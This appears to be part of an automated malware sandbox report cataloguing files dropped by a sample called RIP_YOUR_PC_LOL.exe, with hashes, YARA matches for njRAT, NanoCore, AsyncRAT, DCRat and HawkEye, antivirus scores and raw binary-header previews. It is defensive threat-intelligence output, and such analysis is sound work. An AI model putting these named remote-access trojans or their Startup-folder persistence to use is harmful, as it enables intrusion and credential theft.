                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I.U.I.U.I.U.U.U.I.U.F.U.I.U^U.U.I.U.o.U~I.U5V.U.I.U.F.U.I.U.I.U.K.U.o.U.I.U.I.U.I.U5V.U.I.URich.I.U................PE..L....{.].................@...................P....@..........................P".................................................@....@"..............................................................................................................text....4.......@.................. ..`.rdata..lP...P...`...P..............@..@.data...........P..................@....rsrc........@"....... .............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Roaming\3.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\4.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):577536
                                                                                                        Entropy (8bit):5.535850322343421
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:aWMT5dtGv3Kom+qn4e9PtlAc7+Q4hMY1FOhcV:bMT5Sw++4ilAZ1OhcV
                                                                                                        MD5:748A4BEA8C0624A4C7A69F67263E0839
                                                                                                        SHA1:6955B7D516DF38992AC6BFF9D0B0F5DF150DF859
                                                                                                        SHA-256:220D8F8FF82D413C81BD02DFA001E1C478E8FBEA44BAD24F21B3A5284E15632E
                                                                                                        SHA-512:5FCDFDDCE3CC2E636001ED08C5F2F7590AADAA37C091F7BA94E519D298E284362721F1859C6FFBF064AE23E05D4E0E9754B515396812FBE9F9028497396799FD
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\3.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Users\user\AppData\Roaming\3.exe, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\3.exe, Author: ditekSHen
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 47%, Browse
                                                                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a............................N.... ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................0.......H...........l............................................................*&.(......*J..(........(.....*"..}....*^..}.....(........}....*.0..{.............."5-...YE....5...1...N...N...5...+... ..+...".<+>..\5.../.,+...\.!++..{..+...}..+...+....+...+...+...+...+...+...+..*..0..#..............n..+...t..+....+....+...+..*..0..............R.....o....(........s.......8&.......o....(............9....+......+....;....8.........._,.....+......,.....XT.o......8i...........,..r...p..o..

                                                                                                        C:\Users\user\AppData\Roaming\4.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):579127
                                                                                                        Entropy (8bit):7.206124159305961
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:xzxzTDWikLSb4NS7IODX+KEe+gpSwcxRLe4:bDWHSb4Ngse+USTR64
                                                                                                        MD5:E6DACE3F577AC7A6F9747B4A0956C8D7
                                                                                                        SHA1:86C71169025B822A8DFBA679EA981035CE1ABFD1
                                                                                                        SHA-256:8B4B846FE1023FA173AB410E3A5862A4C09F16534E14926878E387092E7FFB63
                                                                                                        SHA-512:1C8554D3D9A1B1509BA1DF569EDE3FB7A081BEF84394C708C4F1A2FB8779F012C74FBF6DE085514E0C8DEBB5079CC23C6C6112B95BF2F0AB6A8F0BD156A3E268
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 17%, Browse
                                                                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...+...._......._..'...._f.'...._..'...Rich&...........PE..L....).`.....................2...............0....@.......................................@.........................0...4...d...<....0...R......................|"......T............................U..@............0..`...... ....................text............................... ..`.rdata.."....0......................@..@.data...(7..........................@....didat....... ......................@....rsrc....R...0...T..................@..@.reloc..|".......$...&..............@..B................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1241088
                                                                                                        Entropy (8bit):7.769765528202914
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:mMyMzC8+ovorlBtugg0uHqJkSkSZI7C8JaYRHwOwhNGWwQ58Xaj8rac:mMHF+lxuPHYkSfI77aYRQOayac
                                                                                                        MD5:8F1C8B40C7BE588389A8D382040B23BB
                                                                                                        SHA1:BEF5209AE90A3BD3171E1E0BE4E8148C4CCD8A6A
                                                                                                        SHA-256:ED58FFEE46A583C177C792B56C9FC20CCD9509D125F2E3FC90C4F48DE7E2C2A1
                                                                                                        SHA-512:9192B6F2F8320A728C445F9CD6E6D66495AD0EBEBD7FF193DC09EE8AE57B3933C1B75DC208E7D638DB273CB9D31B4CA24EE7BFD9729FF0CDBF432D72BB322B1F
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 26%, Browse
                                                                                                        • Antivirus: ReversingLabs, Detection: 86%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.a..................... ......6(............@.................................k...........................................P.......t...............................................................................d............................text...P........................... ..`.data...............................@....rsrc...t...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8
                                                                                                        Entropy (8bit):3.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:tiK:f
                                                                                                        MD5:A032CE284A49FD6CF341559395411B90
                                                                                                        SHA1:9A556CCC1AE76361E16EC13A4549BCEB79D6F383
                                                                                                        SHA-256:CE980B79958BE0B1DA2EFC904A80EFD8FA0B1E3607152100190A001AA399E1F5
                                                                                                        SHA-512:14D6696A4B21C6FBD461FED6F895E0FDAE6706F3DE897E4EE2E29EC9C90F129DE423F3D3476D6BABF4AE1EFAB365C92D697B1355A72CE308DBE2EED97F840E05
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:!a:.p..H

                                                                                                        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):42
                                                                                                        Entropy (8bit):4.15091348260215
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:oNN+EaKC5fMN:oNN7aZ5fMN
                                                                                                        MD5:F00851831855D57C5FAB0A8B025C3ECE
                                                                                                        SHA1:B44A5459ED55DEF8D4F1283651C031B98BBD4F36
                                                                                                        SHA-256:A9CC872641CE9C8FA8134CB799FE95C76299F4202119B72F62129667DB38FC33
                                                                                                        SHA-512:4C9B0071735811D3E59E3E0115EECEF168AA3944D71F7C507AF3C046FA8234E020051E13DD5A2D0E4EE347A99263139697D8382AE1D465F9CED0A4315950D7AA
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:C:\Users\user\AppData\Roaming\Opus.exe

                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):49
                                                                                                        Entropy (8bit):1.2701062923235522
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:/l1PL3n:fPL3
                                                                                                        MD5:CD8FA61AD2906643348EEF98A988B873
                                                                                                        SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
                                                                                                        SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
                                                                                                        SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:........................................user.

                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\mediaget.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):37888
                                                                                                        Entropy (8bit):5.575438262402469
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:HLWZcaCisD/WRdL5kyc/Ss4fzrngNsIhOrAF+rMRTyN/0L+EcoinblneHQM3epzN:iZcID5nc/Ss4HysIsrM+rMRa8NuM0t
                                                                                                        MD5:8EEDC01C11B251481DEC59E5308DCCC3
                                                                                                        SHA1:24BF069E9F2A1F12AEFA391674ED82059386B0AA
                                                                                                        SHA-256:0184983A425FEF55D46B7E0EB729A245730EE26414EBE4B155917C0124A19C2D
                                                                                                        SHA-512:52388313B21F14AA69C8B37E0FE0B73F66AA92F08651A16C820AAE65D341DC1AF6B48F3C8D4F657AC990EEAF4B9A01AE769BCA4D3625550011708697D22B69CC
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, Author: ditekSHen
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a................................ ........@.. ....................................@.....................................W.......@............................................................................ ............... ..H............text....... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H........e...E..........................................................&.(......**..(......*.s.........s.........s.........s..........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.............(....(.....+..*...0............(.....+..*.0................(.....+..*.0............(.....+..*.0.. ...................,.(...+.+.+....+...*.0...........................**..(......*....0..&........~..............,.(...+.

                                                                                                        C:\Users\user\AppData\Roaming\Opus.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):208384
                                                                                                        Entropy (8bit):7.449669736966968
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:cLV6Bta6dtJmakIM5zEN/wjwJsvle+o9f/N:cLV6Btpmk1Elepd
                                                                                                        MD5:759185EE3724D7563B709C888C696959
                                                                                                        SHA1:7C166CC3CBFEF08BB378BCF557B1F45396A22931
                                                                                                        SHA-256:9384798985672C356A8A41BF822443F8EB0D3747BFCA148CE814594C1A894641
                                                                                                        SHA-512:ED754357B1B995DE918AF21FECD9D1464BDEA6778F7AB450A34E3AAE22BA7EEBC02F2442AF13774ABFDF97954E419EC9E356B54506C7E3BF12E3B76EE882FA2C
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Florian Roth
                                                                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: ditekSHen
                                                                                                        • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................d........... ........@.. ......................................................................8...W.... ..$`........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc...$`... ...b..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..

                                                                                                        C:\Users\user\AppData\Roaming\Pluto Panel.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):913920
                                                                                                        Entropy (8bit):7.376805169532317
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:ypEQtqB5urTIoYWBQk1E+VF9mOx9wi1T0hnbkOWAvyPx4+c/bUUCy:HQtqBorTlYWBhE+V3mO5vWgxE/nb
                                                                                                        MD5:ED666BF7F4A0766FCEC0E9C8074B089B
                                                                                                        SHA1:1B90F1A4CB6059D573FFF115B3598604825D76E6
                                                                                                        SHA-256:D1330D349BFBD3AEA545FA08EF63339E82A3F4D04E27216ECC4C45304F079264
                                                                                                        SHA-512:D0791EAA9859D751F946FD3252D2056C29328FC97E147A5234A52A3728588A3A1AAA003A8E32863D338EBDCA92305C48B6FA12CA1E620CF27460BF091C3B6D49
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Arnim Rupp
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: JPCERT/CC Incident Response Group
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.a.....................4........... ........@.. ....................................@.....................................S.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`....... ..............@..B........................H.......0}..h..............X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......

                                                                                                        C:\Users\user\AppData\Roaming\___11.19.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16322590
                                                                                                        Entropy (8bit):7.8569139750386485
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:393216:G7BPkdKzrZciLxv8naSNtPr5rn57M84UTB9xO5/VWvJKJPkwdnfZ:uBPQwxMR7pn5qUTB9xOFVWvJKJPkwdnB
                                                                                                        MD5:A071727B72A8374FF79A695ECDE32594
                                                                                                        SHA1:B2ABA60B3332D6B8F0A56CEA310CDC2BDB4F9FFC
                                                                                                        SHA-256:8ECDFE60EACB5BF647AE69BCBC41DD727EA3089E92B4B08EBCA3A8D162E50745
                                                                                                        SHA-512:854B93FB6B9BF0FE4CAEF5572935852CE8BECF2BC7BD41B192A4B3CEFB7854A2405C6C0C06BBDD4E1026FF9440EC753911DCC935FE68118E322614C1B918E400
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........H..u...u...u...~...u.......u.......u.C.{...u...y...u...f...u...f...u...t.`.u.C.(...u...~...u.(.~...u.(.....u...u...u...s...u.Rich..u.........PE..L.....ca............................5.............@.........................................................................xi.......................................................................................................................text............................... ..`.rdata.............................@..@.data....@....... ..................@....rsrc............ ..................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Roaming\a.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1484512
                                                                                                        Entropy (8bit):7.99205858382872
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:24576:XsoFdKkWRoohlLUI9AMNo9p2mbfmqFycZm4lZD3Ya10Hue4MBSYcQkEaHNYK3Kyh:XrHW6ilLU1Eor3Fg4lBIM0Hue1BSYcQ4
                                                                                                        MD5:52CFD35F337CA837D31DF0A95CE2A55E
                                                                                                        SHA1:88EB919FA2761F739F02A025E4F9BF1FD340B6FF
                                                                                                        SHA-256:5975E737584DDF2601C02E5918A79DAD7531DF0E13DCA922F0525F66BEC4B448
                                                                                                        SHA-512:B584282F6F5396C3BBED7835BE67420AA14D11B9C42A88B0E3413A07A6164C22D6F50D845D05F48CB95D84FD9545D0B9E25E581324A08B3A95CED9F048D41D73
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O...............0.............. ... ........@.. ....................... <.. ..-A6.....................................|L7.........r........................................................................................................................ ......................@....rsrc.... ..........................@............ ..........................@............ ..........................@............ 5.. ...V..................@....uxD5Xzb.....@7.....................@....adata... ....<.....................@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Roaming\aaa.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):122880
                                                                                                        Entropy (8bit):7.206630188700291
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:zMJQH6NvccnsXOf4qhi01sXT0RZTF27rcAXIlWMhBN2/MTDM:zMxsU9i0iXT0RZo7Iwhec/MTD
                                                                                                        MD5:860AA57FC3578F7037BB27FC79B2A62C
                                                                                                        SHA1:A14008FE5E1EB88BF46266DE3D5EE5DB2E0A722B
                                                                                                        SHA-256:5430565C4534B482C7216A0AE75D04E201EE0DB0386682C0C010243083C28D29
                                                                                                        SHA-512:6639B3E2594E554C7FA811F22E1C514474D34220155B4C989AD8716DB1A0AEA65894AA23D78C12A4618C57312DA00353A77DD8E6C6BDD927BF865F2E98AFF8F1
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......S............................n.... ........@.. .......................@............@................................. ...K............................ ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................P.......H.......t................5..x............................................ .........%.....(......... t........%.....(.........*..V~....(....~....o....*....(....*R .l..q..(-........*....0..........~.........E........................-...~.... .... ....(...+..t....,... ......[.+..+......(....(!....t....('...........t..........(......u.... .... ....(...+(....~.... ....~.... .....~.... .....X.k_.*.*.....(....*.(....t....~....o@...()....f..(...+.....*....0..........(*....I.U(...+..

                                                                                                        C:\Users\user\AppData\Roaming\gay.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):37888
                                                                                                        Entropy (8bit):5.575438262402469
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:HLWZcaCisD/WRdL5kyc/Ss4fzrngNsIhOrAF+rMRTyN/0L+EcoinblneHQM3epzN:iZcID5nc/Ss4HysIsrM+rMRa8NuM0t
                                                                                                        MD5:8EEDC01C11B251481DEC59E5308DCCC3
                                                                                                        SHA1:24BF069E9F2A1F12AEFA391674ED82059386B0AA
                                                                                                        SHA-256:0184983A425FEF55D46B7E0EB729A245730EE26414EBE4B155917C0124A19C2D
                                                                                                        SHA-512:52388313B21F14AA69C8B37E0FE0B73F66AA92F08651A16C820AAE65D341DC1AF6B48F3C8D4F657AC990EEAF4B9A01AE769BCA4D3625550011708697D22B69CC
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: ditekSHen
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a................................ ........@.. ....................................@.....................................W.......@............................................................................ ............... ..H............text....... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H........e...E..........................................................&.(......**..(......*.s.........s.........s.........s..........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.............(....(.....+..*...0............(.....+..*.0................(.....+..*.0............(.....+..*.0.. ...................,.(...+.+.+....+...*.0...........................**..(......*....0..&........~..............,.(...+.

                                                                                                        C:\Users\user\AppData\Roaming\healastounding.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3733504
                                                                                                        Entropy (8bit):7.794569867865562
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:98304:pAdy2TU151ZIpH8YcItGTHF+iSfI77agdayaW/ej:gy5Ls8YcItWFXlWZVy
                                                                                                        MD5:6FB798F1090448CE26299C2B35ACF876
                                                                                                        SHA1:451423D5690CFFA02741D5DA6E7C45BC08AEFB55
                                                                                                        SHA-256:B4F86FF48C5F6B01E0AD4543FB78E0435E81F3EC2AACA89866862157C0DACF4F
                                                                                                        SHA-512:9CC2421A2F3AB01D15BE62A848947B03F1A8212CFD923573CF70F8C10BD8D124AEE3B251828834236AF291EA12450AC2580A712E53A022CE11B4D71B0357D8C3
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: ditekSHen
                                                                                                        • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..................8...........9.. ... 9...@.. .......................`9...........@...................................9.W.... 9......................@9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc........ 9.......8.............@..@.reloc.......@9.......8.............@..B..................9.....H.......@.9.............`!....8..........................................0..f.......r...pr#..p(....t.....r9..p(.......+..........i].a...X....i2..(....o....................(......(....&*...0..q.......(.......o......s......o.....+*.o....u....,..o....t.....(....,..o.......&.o....-....,..o........,..o.....s....z..*...........=R..........P^........8............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Res

                                                                                                        C:\Users\user\AppData\Roaming\mediaget.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\gay.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):37888
                                                                                                        Entropy (8bit):5.575438262402469
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:HLWZcaCisD/WRdL5kyc/Ss4fzrngNsIhOrAF+rMRTyN/0L+EcoinblneHQM3epzN:iZcID5nc/Ss4HysIsrM+rMRa8NuM0t
                                                                                                        MD5:8EEDC01C11B251481DEC59E5308DCCC3
                                                                                                        SHA1:24BF069E9F2A1F12AEFA391674ED82059386B0AA
                                                                                                        SHA-256:0184983A425FEF55D46B7E0EB729A245730EE26414EBE4B155917C0124A19C2D
                                                                                                        SHA-512:52388313B21F14AA69C8B37E0FE0B73F66AA92F08651A16C820AAE65D341DC1AF6B48F3C8D4F657AC990EEAF4B9A01AE769BCA4D3625550011708697D22B69CC
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: Joe Security
